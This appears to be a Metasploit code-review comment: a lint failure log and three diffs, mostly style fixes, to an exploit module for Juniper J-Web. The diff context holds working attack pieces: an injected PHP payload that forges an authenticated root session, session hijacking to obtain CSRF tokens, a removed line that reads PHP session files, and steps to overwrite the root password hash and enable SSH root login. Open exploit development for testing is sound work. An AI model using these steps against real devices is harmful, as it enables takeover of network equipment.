Per the linting failure:

```
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:35 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:36 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:37 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:145 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:200 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:211 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:225 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:2[28](https://github.com/rapid7/metasploit-framework/actions/runs/9405267954/job/25952256948?pr=19229#step:5:29) - [WARNING] Spaces at EOL
== modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb ==
C: 35:116: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C: 36:115: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C: 37:121: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C: 39:  9: [Correctable] Layout/ModuleDescriptionIndentation: Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
C:145:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:156: 25: [Correctable] Style/DefWithParentheses: Omit the parentheses in defs when the method doesn't accept any arguments.
C:200:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:211:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:213: 41: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C:225:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:228:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:[32](https://github.com/rapid7/metasploit-framework/actions/runs/9405267954/job/25952256948?pr=19229#step:5:33)6: 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.

1 file inspected, 12 offenses detected, 12 offenses autocorrectable
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb and verify all issues are resolved
```

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -32,9 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
           By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a
           datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated
-          to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated 
-          to the J-Web application this exploit will try to create one. If unsuccesfull this method will not work. 
-          The module then authenticates with the new root password over SSH and then rewrites the original root password 
+          to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated
+          to the J-Web application this exploit will try to create one. If unsuccesfull this method will not work.
+          The module then authenticates with the new root password over SSH and then rewrites the original root password
           hash to /etc/master.passwd. There is an option to set allow ssh root login, if disabled.
         },
         'Author' => [
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-    
+
     php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]
 
     if php_session_id.nil?
@@ -153,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
     php_session_id
   end
 
-  def create_php_session()
+  def create_php_session
     create_sess = "<?php
 require('main.inc.php');
 global $loginPage;
@@ -197,7 +197,7 @@ $output = $user->xnm->query('request-web-management-login',
     ), true);
 $output = $user->transform->strip_ns($output);
 $user->session->set_authenticated(2919675462);
-  
+
 $imageName = $c['version']['release'];
 $user->set_var('junos-version',$imageName);
 ?>"
@@ -208,9 +208,9 @@ $user->set_var('junos-version',$imageName);
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-    
+
     php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]
-    fail_with(Failure::UnexpectedReply, "Failed to create a user session.") unless php_session_id
+    fail_with(Failure::UnexpectedReply, 'Failed to create a user session.') unless php_session_id
     print_status("Session created: #{php_session_id}.")
     php_session_id
   end
@@ -222,10 +222,10 @@ $user->set_var('junos-version',$imageName);
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-    
+
     print_status("Print Session Cookie: #{res.body.lines.first}.")
     csrf_token = res.body.scan(/csrf_token\|s:\d+:"([^"]+)";/).flatten[0]
-    
+
     fail_with(Failure::UnexpectedReply, 'Unable to retrieve a csrf token') unless csrf_token
     print_status("Found csrf token: #{csrf_token}.")
     csrf_token
@@ -323,7 +323,7 @@ $user->set_var('junos-version',$imageName);
     unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success'
       fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")
     end
-    print_status("Successfully set ssh root login to allow")
+    print_status('Successfully set ssh root login to allow')
   end
 
   def ssh_login

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -216,16 +216,22 @@ $user->set_var('junos-version',$imageName);
   end
 
   def get_csrf_token(php_session_id)
-    get_var_sess = "<?php echo file_get_contents('#{datastore['SESSION_DIRECTORY']}/sess_#{php_session_id}'); ?>"
-
-    res = send_php_exploit('/dev/fd/0', get_var_sess)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'diagnose'),
+      'method' => 'GET',
+      'headers' =>
+        {
+          'Cookie' => "PHPSESSID=#{php_session_id}; SECUREPHPSESSID=#{php_session_id}"
+        },
+      'vars_get' => {
+        'm[]' => 'pinghost'
+      }
+    )
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
 
-    print_status("Print Session Cookie: #{res.body.lines.first}.")
-    csrf_token = res.body.scan(/csrf_token\|s:\d+:"([^"]+)";/).flatten[0]
-
+    csrf_token = res.get_html_document.xpath("//input[@type='hidden' and @name='csrf_token']/@value").text
     fail_with(Failure::UnexpectedReply, 'Unable to retrieve a csrf token') unless csrf_token
     print_status("Found csrf token: #{csrf_token}.")
     csrf_token

--- a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
+++ b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -176,7 +176,7 @@ $user->set_var('device-model', $_SERVER['JNX_PRODUCT_MODEL']);
 $user->set_var(TEMPLATE_USERNAME, 'root');
 $user->set_var(USERNAME, 'root');
 $user->set_var(LSYSNAME, '');
-$user->set_var ('csrf_token', 'asdf');
+$user->set_var ('csrf_token', '#{Faker::Alphanumeric.alphanumeric}');
 
 // Set up default variables for user
 $user->set_var(DEBUG_ASP, 'sp-0/0/0');

